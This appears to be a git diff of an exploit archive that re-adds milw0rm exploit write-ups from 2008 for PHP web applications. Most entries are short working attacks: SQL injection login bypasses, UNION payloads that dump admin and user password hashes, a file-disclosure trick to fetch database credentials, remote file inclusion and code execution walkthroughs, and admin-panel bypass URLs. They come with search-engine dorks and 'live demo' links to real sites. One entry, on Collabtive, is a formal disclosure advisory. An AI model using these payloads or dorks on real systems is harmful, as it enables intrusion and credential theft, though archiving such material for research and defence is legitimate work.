@@ -1,67 +1,67 @@ -*********************************************************************************************************************************************************** -[!] [!] -[!] OOOO O OOOOOOOOO [!] -[!] O O O O O [!] -[!] O O O [!] -[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] -[!] O OOO OOO O O O O OO O O O O OO O O O [!] -[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] -[!] O O OOOO O O O O O O O O O O O [!] -[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] -[!] OO [!] -[!] OO [!] -[!] OO Proud To Be MoroCCaN [!] -[!] OO [!] -*********************************************************************************************************************************************************** - +---- Bismi Allah Irahmani ArraHim ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [ExoPHPDesk v1.2 Final(Auth Bypass) SQL Injection Vulnerability] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: Author : Cyber-Zone ( Abdelkhalek ) : : : -¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ -¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ -¦ From : MoroCCo ¦ ¦ ¦ -¦ Script : http://exocrew.com ¦ ¦ ![ ]! ¦ -¦ Download : http://exocrew.com/help_demo ¦ ¦ ¦ -¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ -¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ -¦ From The Dark Side Of MoroCCo ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -: : -¦ Remember : ¦ -¦ ------------- ¦ -¦ ¦ -¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. 
¦ -¦ ¦ - -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] ++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ - - -Bypass : ........ - -Go To The Admin Panel. -and Login with this information : - -username : admin ' or ' 1=1 -password : Cyber-Zone or any thing you want - -yeah bro you loged in dont worry :) - -and this is a live demo : -http://exocrew.com/help_demo/admin.php - -EnjoY. - - - -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -+---- ThanX To ----+ -++--------------------------------------------------------------------------------------------------------------------------------------------------------+ -++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ -+--------------------------------------------------------------------------------------------------------------------------------------------------------++ -= [AttaCk Is CompLet] = -___________________________________________________________________________________________________________________________________________________________ - -# milw0rm.com [2008-11-09] +*********************************************************************************************************************************************************** +[!] [!] +[!] OOOO O OOOOOOOOO [!] +[!] O O O O O [!] +[!] O O O [!] +[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!] +[!] O OOO OOO O O O O OO O O O O OO O O O [!] +[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!] +[!] 
O O OOOO O O O O O O O O O O O [!] +[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!] +[!] OO [!] +[!] OO [!] +[!] OO Proud To Be MoroCCaN [!] +[!] OO [!] +*********************************************************************************************************************************************************** + +---- Bismi Allah Irahmani ArraHim ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [ExoPHPDesk v1.2 Final(Auth Bypass) SQL Injection Vulnerability] ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: Author : Cyber-Zone ( Abdelkhalek ) : : : +¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ¦ ¦ ¦ +¦ Home : WwW.IQ-Ty.CoM ¦ ¦ MySQL Version Is : ¦ +¦ From : MoroCCo ¦ ¦ ¦ +¦ Script : http://exocrew.com ¦ ¦ ![ ]! ¦ +¦ Download : http://exocrew.com/help_demo ¦ ¦ ¦ +¦ RisK : High [¦¦¦¦¦¦¦¦] ¦ ¦ ¦ +¦ --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ¦ +¦ From The Dark Side Of MoroCCo ++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ +: : +¦ Remember : ¦ +¦ ------------- ¦ +¦ ¦ +¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ¦ +¦ ¦ + +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo , Wal9adimo Al3an [!] 
++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ + + +Bypass : ........ + +Go To The Admin Panel. +and Login with this information : + +username : admin ' or ' 1=1 +password : Cyber-Zone or any thing you want + +yeah bro you loged in dont worry :) + +and this is a live demo : +http://exocrew.com/help_demo/admin.php + +EnjoY. + + + ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ ++---- ThanX To ----+ +++--------------------------------------------------------------------------------------------------------------------------------------------------------+ +++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++ ++--------------------------------------------------------------------------------------------------------------------------------------------------------++ += [AttaCk Is CompLet] = +___________________________________________________________________________________________________________________________________________________________ + +# milw0rm.com [2008-11-09] diff --git a/platforms/php/webapps/7072.txt b/platforms/php/webapps/7072.txt index ee57007c1..f733cf38c 100755 --- a/platforms/php/webapps/7072.txt +++ b/platforms/php/webapps/7072.txt 
@@ -1,51 +1,51 @@ -|___________________________________________________| -| -| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : www.IQ-TY.com & www.TrYaG.cc -| -| email: darkangeL_G85@Yahoo.COM -| -| -|___________________________________________________ -| | -| -| script: http://zeeways.com/php-software/zeematri-v3.0.html -| -| Dork: "Powered by ZeeMatri" -| -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - -L!VE DEMO: -_________ - - -http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- - - - - - -___________________ - - -Admin LogiN : - -www.[target].com/Script/admin/ - -# milw0rm.com [2008-11-09] +|___________________________________________________| +| +| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : www.IQ-TY.com & www.TrYaG.cc +| +| email: darkangeL_G85@Yahoo.COM +| +| +|___________________________________________________ +| | +| +| script: http://zeeways.com/php-software/zeematri-v3.0.html +| +| Dork: "Powered by ZeeMatri" +| +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + +L!VE DEMO: +_________ + + +http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin-- + + + + + +___________________ + + +Admin LogiN : + +www.[target].com/Script/admin/ + +# milw0rm.com [2008-11-09] 
diff --git a/platforms/php/webapps/7074.txt b/platforms/php/webapps/7074.txt
index 20ec53ee6..ecc2d6b75 100755
--- a/platforms/php/webapps/7074.txt
+++ b/platforms/php/webapps/7074.txt
@@ -1,46 +1,46 @@ -################# ~THUNDER ################################################################ - - - ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability - - ~Founded by : THUNDER - ~Dork: "This search engine is in no way intended for illegal downloads. " - ~File : Download.php - -=========================================================================================== - -to read files you need to encode the url, so you can use this php code : - - -How to use : http://127.0.0.1/encode.php?t=[Url] -Ex : http://127.0.0.1/encode.php?t=includes/constants.php - -##### ~Exploit ############################################################################ - - - http://www.target.com/[path]/download.php?url=[Encoded url] - -Example : -let's download the constants.php file wich contains the database login and password . -the file will be downloaded as .mp3 exstension . - -http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870 - -Open the downloaded file with any text editor... ,and you got the database . - - - -########################################################################################### - -# milw0rm.com [2008-11-09] +################# ~THUNDER ################################################################ + + + ~X10media Mp3 Search Engine v1.5.5 - 1.6 Remote File Disclosure Vulnerability + + ~Founded by : THUNDER + ~Dork: "This search engine is in no way intended for illegal downloads. 
" + ~File : Download.php + +=========================================================================================== + +to read files you need to encode the url, so you can use this php code : + + +How to use : http://127.0.0.1/encode.php?t=[Url] +Ex : http://127.0.0.1/encode.php?t=includes/constants.php + +##### ~Exploit ############################################################################ + + + http://www.target.com/[path]/download.php?url=[Encoded url] + +Example : +let's download the constants.php file wich contains the database login and password . +the file will be downloaded as .mp3 exstension . + +http://www.target.com/[path]/download.php?url=696e636c756465732f636f6e7374616e74732e706870 + +Open the downloaded file with any text editor... ,and you got the database . + + + +########################################################################################### + +# milw0rm.com [2008-11-09] diff --git a/platforms/php/webapps/7076.txt b/platforms/php/webapps/7076.txt index 4f1a47453..519024850 100755 --- a/platforms/php/webapps/7076.txt +++ b/platforms/php/webapps/7076.txt 
@@ -1,174 +1,174 @@ -Collabtive 0.4.8 Multiple Vulnerabilities - - Name Multiple Vulnerabilities in Collabtive - Systems Affected Collabtive 0.4.8 and possibly earlier versions - Severity High - Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) - Vendor http://collabtive.o-dyn.de/ - Advisory http://www.ush.it/team/ush/hack-collabtive048/adv.txt - Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) - Francesco "ascii" Ongaro (ascii AT ush DOT it) - Giovanni "evilaliv3" Pellerano (evilaliv3 AT - digitalbullets DOT org) - Date 20080925 - -I. BACKGROUND - ->From the Collabtive web site: "Collabtive is collaborative software to -get your projects done!". - -II. DESCRIPTION - -Multiple vulnerabilities exist in Collabtive software. - -III. ANALYSIS - -Summary: - - A) Stored Cross Site Scripting - B) Forceful browsing authentication bypass - C) Arbitrary file upload - -A) Stored Cross Site Scripting - -A stored XSS vulnerability exists in the "/admin.php?action=projects" -section. - -Once the attacker specifies an XSS attack vector, like -"", as the "Name" property of a project then -an XSS vulnerability occurs because the projects "Name" fields are -stored and printed without any filtering. - -While the cited section poses limits on the "Name" field when -reflecting the XSS payload, clicking on the edit link -"/manageproject.php?action=editform&id=" results in a page -without limitations on the characters showed thus allowing complete -exploitation. - -This vulnerability requires administrator authentication. - -CSRF+XSS and timing (JS) can be used to successfully exploit this -vulnerability in an automated manner. - -B) Forceful browsing authentication bypass - -An authentication bypass vulnerability exists in -"/admin.php?action=users&mode=added". Directly pointing to that URL -shows an error, however at the bottom of the page there is a web -form that permits to create new users with full privileges. 
- -With this vulnerability an attacker without any valid credentials can -create a new valid administrator. - -Since this vulnerability has been discovered the exploitation -prerequisites changed as detailed below: - -- A bug fix in the latest version 0.4.8 now requires "globals on" in -order to exploit this vulnerability. - -- In version 0.4.6 instead the vulnerability is exploitable regardless -the "globals" settings. - -C) Arbitrary file upload - -It's possible to upload arbitrary files with arbitrary extensions. -An attacker that has not already gained Administration privileges using -the previously exposed vulnerabilities must be assigned to at least one -project. - -To upload a file go to "/managefile.php?action=showproject&id=" -and add a new file. - -If a file with .php extension is uploaded then the mimetype will be -"php/plain" and the program will change the extension to .txt in order -to prevent exploitation. - -This security control can be bypassed changing the mimetype to -text/plain, in this way the application will believe that a normal .txt -file was uploaded and the extension will not be changed. - -The uploaded file resides in "/files//_$seed.php". - -An authenticated attacker will simply see the seed (and the complete -filename) using the web interface and can directly execute it. - -In case of unauthenticated attackers the filename must be guessed. -Luckily the make_seed() routine leaks real random proprieties and is -only based on the time. $seed can be easily bruteforced using values -that are likely to match the return derived by the microtime() of the -upload. - -private function make_seed() -{ - list($usec, $sec) = explode(' ', microtime()); - $value = (float) $sec + ((float) $usec * 100000); - return $value; -} - -As easily understandable $seed can be guessed in really few tries. The -same vulnerability exists when attaching a file in the "Messages" -section. - -This vulnerability can also be exploited via CSRF. - -IV. 
DETECTION - -Collabtive 0.4.8 and possibly earlier versions are vulnerable. - -V. WORKAROUND - -Proper input validation will fix the vulnerabilities. - -VI. VENDOR RESPONSE - -No fix available. - -VII. CVE INFORMATION - -No CVE at this time. - -VIII. DISCLOSURE TIMELINE - -20080926 Initial vendor contact (No Response) -20081003 Second vendor contact (No Response) -20081010 Third vendor contact -20081010 Vendor response (Fix promised for the end of October) -20081010 Vendor contact to sync disclosure time (No response) -20081110 Advisory released (Fix not available) - -IX. CREDIT - -Antonio "s4tan" Parata, Francesco "ascii" Ongaro and -Giovanni "evilaliv3" Pellerano are credited with the discovery of this -vulnerability. - -Antonio "s4tan" Parata -web site: http://www.ictsc.it/ -mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it - -Francesco "ascii" Ongaro -web site: http://www.ush.it/ -mail: ascii AT ush DOT it - -Giovanni "evilaliv3" Pellerano -mail: evilaliv3 AT digitalbullets DOT org - -X. LEGAL NOTICES - -Copyright (c) 2008 Francesco "ascii" Ongaro - -Permission is granted for the redistribution of this alert -electronically. It may not be edited in any way without mine express -written consent. If you wish to reprint the whole or any -part of this alert in any other medium other than electronically, -please email me for permission. - -Disclaimer: The information in the advisory is believed to be accurate -at the time of publishing based on currently available information. Use -of the information constitutes acceptance for use in an AS IS condition. -There are no warranties with regard to this information. Neither the -author nor the publisher accepts any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. 
- -# milw0rm.com [2008-11-10] +Collabtive 0.4.8 Multiple Vulnerabilities + + Name Multiple Vulnerabilities in Collabtive + Systems Affected Collabtive 0.4.8 and possibly earlier versions + Severity High + Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) + Vendor http://collabtive.o-dyn.de/ + Advisory http://www.ush.it/team/ush/hack-collabtive048/adv.txt + Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) + Francesco "ascii" Ongaro (ascii AT ush DOT it) + Giovanni "evilaliv3" Pellerano (evilaliv3 AT + digitalbullets DOT org) + Date 20080925 + +I. BACKGROUND + +>From the Collabtive web site: "Collabtive is collaborative software to +get your projects done!". + +II. DESCRIPTION + +Multiple vulnerabilities exist in Collabtive software. + +III. ANALYSIS + +Summary: + + A) Stored Cross Site Scripting + B) Forceful browsing authentication bypass + C) Arbitrary file upload + +A) Stored Cross Site Scripting + +A stored XSS vulnerability exists in the "/admin.php?action=projects" +section. + +Once the attacker specifies an XSS attack vector, like +"", as the "Name" property of a project then +an XSS vulnerability occurs because the projects "Name" fields are +stored and printed without any filtering. + +While the cited section poses limits on the "Name" field when +reflecting the XSS payload, clicking on the edit link +"/manageproject.php?action=editform&id=" results in a page +without limitations on the characters showed thus allowing complete +exploitation. + +This vulnerability requires administrator authentication. + +CSRF+XSS and timing (JS) can be used to successfully exploit this +vulnerability in an automated manner. + +B) Forceful browsing authentication bypass + +An authentication bypass vulnerability exists in +"/admin.php?action=users&mode=added". Directly pointing to that URL +shows an error, however at the bottom of the page there is a web +form that permits to create new users with full privileges. 
+ +With this vulnerability an attacker without any valid credentials can +create a new valid administrator. + +Since this vulnerability has been discovered the exploitation +prerequisites changed as detailed below: + +- A bug fix in the latest version 0.4.8 now requires "globals on" in +order to exploit this vulnerability. + +- In version 0.4.6 instead the vulnerability is exploitable regardless +the "globals" settings. + +C) Arbitrary file upload + +It's possible to upload arbitrary files with arbitrary extensions. +An attacker that has not already gained Administration privileges using +the previously exposed vulnerabilities must be assigned to at least one +project. + +To upload a file go to "/managefile.php?action=showproject&id=" +and add a new file. + +If a file with .php extension is uploaded then the mimetype will be +"php/plain" and the program will change the extension to .txt in order +to prevent exploitation. + +This security control can be bypassed changing the mimetype to +text/plain, in this way the application will believe that a normal .txt +file was uploaded and the extension will not be changed. + +The uploaded file resides in "/files//_$seed.php". + +An authenticated attacker will simply see the seed (and the complete +filename) using the web interface and can directly execute it. + +In case of unauthenticated attackers the filename must be guessed. +Luckily the make_seed() routine leaks real random proprieties and is +only based on the time. $seed can be easily bruteforced using values +that are likely to match the return derived by the microtime() of the +upload. + +private function make_seed() +{ + list($usec, $sec) = explode(' ', microtime()); + $value = (float) $sec + ((float) $usec * 100000); + return $value; +} + +As easily understandable $seed can be guessed in really few tries. The +same vulnerability exists when attaching a file in the "Messages" +section. + +This vulnerability can also be exploited via CSRF. + +IV. 
DETECTION + +Collabtive 0.4.8 and possibly earlier versions are vulnerable. + +V. WORKAROUND + +Proper input validation will fix the vulnerabilities. + +VI. VENDOR RESPONSE + +No fix available. + +VII. CVE INFORMATION + +No CVE at this time. + +VIII. DISCLOSURE TIMELINE + +20080926 Initial vendor contact (No Response) +20081003 Second vendor contact (No Response) +20081010 Third vendor contact +20081010 Vendor response (Fix promised for the end of October) +20081010 Vendor contact to sync disclosure time (No response) +20081110 Advisory released (Fix not available) + +IX. CREDIT + +Antonio "s4tan" Parata, Francesco "ascii" Ongaro and +Giovanni "evilaliv3" Pellerano are credited with the discovery of this +vulnerability. + +Antonio "s4tan" Parata +web site: http://www.ictsc.it/ +mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it + +Francesco "ascii" Ongaro +web site: http://www.ush.it/ +mail: ascii AT ush DOT it + +Giovanni "evilaliv3" Pellerano +mail: evilaliv3 AT digitalbullets DOT org + +X. LEGAL NOTICES + +Copyright (c) 2008 Francesco "ascii" Ongaro + +Permission is granted for the redistribution of this alert +electronically. It may not be edited in any way without mine express +written consent. If you wish to reprint the whole or any +part of this alert in any other medium other than electronically, +please email me for permission. + +Disclaimer: The information in the advisory is believed to be accurate +at the time of publishing based on currently available information. Use +of the information constitutes acceptance for use in an AS IS condition. +There are no warranties with regard to this information. Neither the +author nor the publisher accepts any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7077.txt b/platforms/php/webapps/7077.txt index 24e60cda5..1a12813f7 100755 --- a/platforms/php/webapps/7077.txt 
+++ b/platforms/php/webapps/7077.txt @@ -1,14 +1,14 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - - OTManager 2.4 Remote File Inclusion (RFI) Vulnerability - - - Security flaw discovered by Colt7r - - CONTACT: colt7r |@| bsdmail.org - - - Affected Software: OTManager 2.4 - - Risk: HIGH - - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE] - --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= - -# milw0rm.com [2008-11-10] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + + OTManager 2.4 Remote File Inclusion (RFI) Vulnerability + + - Security flaw discovered by Colt7r + - CONTACT: colt7r |@| bsdmail.org + + - Affected Software: OTManager 2.4 + - Risk: HIGH + - Exploit: http://host/Admin/ADM_Pagina.php?Tipo=[EVIL CODE] + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7078.txt b/platforms/php/webapps/7078.txt index d67d90597..e6222c4da 100755 --- a/platforms/php/webapps/7078.txt +++ b/platforms/php/webapps/7078.txt 
@@ -1,29 +1,29 @@ -####################################################### - Joomla Component com_jb2(PostID) SQL-injetion Vulnerability -####################################################### - -################################################### -#[~] Author : boom3rang -#[~] Kosova Hackers Group [www.khg-crew.ws] -#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. - -#[!] Module_Name: com_jb2 -#[!] Script_Name: Joomla -#[!] Google_Dork: inurl:"option=com_jb2 "PostID" -################################################## - --------------------------------------------------------------------------------------------------------------------------------------------------- -#[~] Example: -http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] --------------------------------------------------------------------------------------------------------------------------------------------------- -#[~] Exploit: --9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* --------------------------------------------------------------------------------------------------------------------------------------------------- - -############################## -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################## - -# milw0rm.com [2008-11-10] +####################################################### + Joomla Component com_jb2(PostID) SQL-injetion Vulnerability +####################################################### + +################################################### +#[~] Author : boom3rang +#[~] Kosova Hackers Group [www.khg-crew.ws] +#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1. + +#[!] Module_Name: com_jb2 +#[!] Script_Name: Joomla +#[!] 
Google_Dork: inurl:"option=com_jb2 "PostID" +################################################## + +-------------------------------------------------------------------------------------------------------------------------------------------------- +#[~] Example: +http://localhost/Path/index.php?option=com_jb2&PostID=[exploit] +-------------------------------------------------------------------------------------------------------------------------------------------------- +#[~] Exploit: +-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/* +-------------------------------------------------------------------------------------------------------------------------------------------------- + +############################## +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################## + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7079.txt b/platforms/php/webapps/7079.txt index 41f24250d..15d288481 100755 --- a/platforms/php/webapps/7079.txt +++ b/platforms/php/webapps/7079.txt 
@@ -1,28 +1,28 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - -FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability -Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip -Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php -Exploit : - Go http://www.sanusart.com/php/test/guestbook/guestbook.php -In ->> Name (required): Write ->> Mahmood -In ->> Web site (without http://): Write ->> http://tryag.cc -In ->> Message: Write ->> - -After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id - -See Pictures : 1- http://up1.mlfnt.net/images/7kzeu9l8hdjynjud062.png - 2- http://up1.mlfnt.net/images/rhcuudvtuzv1i62ovp.png - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-11-10] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + +FREEsimplePHPguestbook (guestbook.php) Remote Code Execution Vulnerability +Get Script : http://www.sanusart.com/php/FREEsimplePHPguestbook.zip +Live Deom : http://www.sanusart.com/php/test/guestbook/guestbook.php +Exploit : + Go http://www.sanusart.com/php/test/guestbook/guestbook.php +In ->> Name (required): Write ->> Mahmood +In ->> Web site (without http://): Write ->> http://tryag.cc +In ->> Message: Write ->> + +After All This Go > http://www.sanusart.com/php/test/guestbook/guestbook.php?tryag=id + +See Pictures : 1- http://up1.mlfnt.net/images/7kzeu9l8hdjynjud062.png + 2- http://up1.mlfnt.net/images/rhcuudvtuzv1i62ovp.png + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + 
| | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7080.txt b/platforms/php/webapps/7080.txt index 5d2ba56ad..eb5f8c98c 100755 --- a/platforms/php/webapps/7080.txt +++ b/platforms/php/webapps/7080.txt 
@@ -1,46 +1,46 @@ - 1. +-----------------+-----------------+-----------------+ - 2. +-----------------+Fresh Email Script+----------------+ - 3. +-----------------versions: 1.0 to 1.11 - all - 4. +-----------------exploits: file inclusion & cookie manipulation - 5. +-----------------founder: Don - 6. +-----------------date: November 10. 2008 - 7. +-----------------+-----------------+-----------------+ - 8. +homepage: http://www.freshscripts.net/index.php?do=catalog&c=featured_scripts_!&i=fresh_email_script - 9. +vendor notified ? / no - 10. +-----------------+-----------------+-----------------+ - 11. +[1] - 12. +file inclusion+ - 13. +found in /url.php?tmp_sid= - 14. +so like site[dot]com/url.php?tmp_sid=[] - 15. +attack description: - 16. +The GET variable tmp_sid has been set to http://site[dot]com/some_inexistent_file_with_long_name. - 17. +It is possible for a remote attacker to include a file from local or remote resources and - 18. +or execute arbitrary script code with the privileges of the web server. - 19. +-----------------+-----------------+-----------------+ - 20. +[2] - 21. +cookie manipulation+ - 22. +found in register.php - 23. +By injecting a custom HTTP header or by injecting a META tag, - 24. +it is possible to alter the cookies stored in the browser. - 25. +Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. - 26. +By exploiting this vulnerability, an attacker may conduct a session fixation attack. - 27. +In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, - 28. +thereby eliminating the need to obtain the user's session ID afterwards. - 29. +-----------------+-----------------+-----------------+ - 30. +vuln: - 31. +Email=&Password=1230321email@address.com®ister=Register - 32. +-----------------+-----------------+-----------------+ - 33. +How to fix this vulnerability+ - 34. + - 35. 
+You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. - 36. +Additionally, with each login the application should provide a new session ID to the user. - 37. +-----------------+-----------------+-----------------+ - 38. +greetz to all of my friends - 39. +special greetz to milw0rm as well as str0ke!+ - 40. + - 41. + - 42. +~#Don 2008 - 43. +Serbian security analyzer - 44. +-----------------+-----------------+-----------------+ - -# milw0rm.com [2008-11-10] + 1. +-----------------+-----------------+-----------------+ + 2. +-----------------+Fresh Email Script+----------------+ + 3. +-----------------versions: 1.0 to 1.11 - all + 4. +-----------------exploits: file inclusion & cookie manipulation + 5. +-----------------founder: Don + 6. +-----------------date: November 10. 2008 + 7. +-----------------+-----------------+-----------------+ + 8. +homepage: http://www.freshscripts.net/index.php?do=catalog&c=featured_scripts_!&i=fresh_email_script + 9. +vendor notified ? / no + 10. +-----------------+-----------------+-----------------+ + 11. +[1] + 12. +file inclusion+ + 13. +found in /url.php?tmp_sid= + 14. +so like site[dot]com/url.php?tmp_sid=[] + 15. +attack description: + 16. +The GET variable tmp_sid has been set to http://site[dot]com/some_inexistent_file_with_long_name. + 17. +It is possible for a remote attacker to include a file from local or remote resources and + 18. +or execute arbitrary script code with the privileges of the web server. + 19. +-----------------+-----------------+-----------------+ + 20. +[2] + 21. +cookie manipulation+ + 22. +found in register.php + 23. +By injecting a custom HTTP header or by injecting a META tag, + 24. +it is possible to alter the cookies stored in the browser. + 25. +Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site. + 26. +By exploiting this vulnerability, an attacker may conduct a session fixation attack. + 27. 
+In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, + 28. +thereby eliminating the need to obtain the user's session ID afterwards. + 29. +-----------------+-----------------+-----------------+ + 30. +vuln: + 31. +Email=&Password=1230321email@address.com®ister=Register + 32. +-----------------+-----------------+-----------------+ + 33. +How to fix this vulnerability+ + 34. + + 35. +You need to filter the output in order to prevent the injection of custom HTTP headers or META tags. + 36. +Additionally, with each login the application should provide a new session ID to the user. + 37. +-----------------+-----------------+-----------------+ + 38. +greetz to all of my friends + 39. +special greetz to milw0rm as well as str0ke!+ + 40. + + 41. + + 42. +~#Don 2008 + 43. +Serbian security analyzer + 44. +-----------------+-----------------+-----------------+ + +# milw0rm.com [2008-11-10] diff --git a/platforms/php/webapps/7081.txt b/platforms/php/webapps/7081.txt index 770f8fd41..ec99e3d9e 100755 --- a/platforms/php/webapps/7081.txt +++ b/platforms/php/webapps/7081.txt 
@@ -1,64 +1,64 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - AJ Article Auth Bypass Vulnerability -============================================================================== - - [»] Script: [ AJ Article ] - [»] Language: [ PHP ] - [»] Website: [ http://www.ajsquare.com/products/article/ ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 10.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ XPL ]=== - - [»] http://localhost/[path]/admin/user.php - [»] http://localhost/[path]/admin/articles.php - [»] http://localhost/[path]/admin/articlesuspend.php - [»] http://localhost/[path]/admin/site.php - [»] http://localhost/[path]/admin/statistics.php - [»] http://localhost/[path]/admin/mail.php - [»] http://localhost/[path]/admin/category.php - [»] http://localhost/[path]/admin/subcategory.php - [»] http://localhost/[path]/admin/changepassword.php - [»] http://localhost/[path]/admin/polling.php - [»] http://localhost/[path]/admin/logo.php - [»] ... - - - -===[ LIVE ]=== - - [»] http://www.ajsquare.com/products/demo/admin/ - 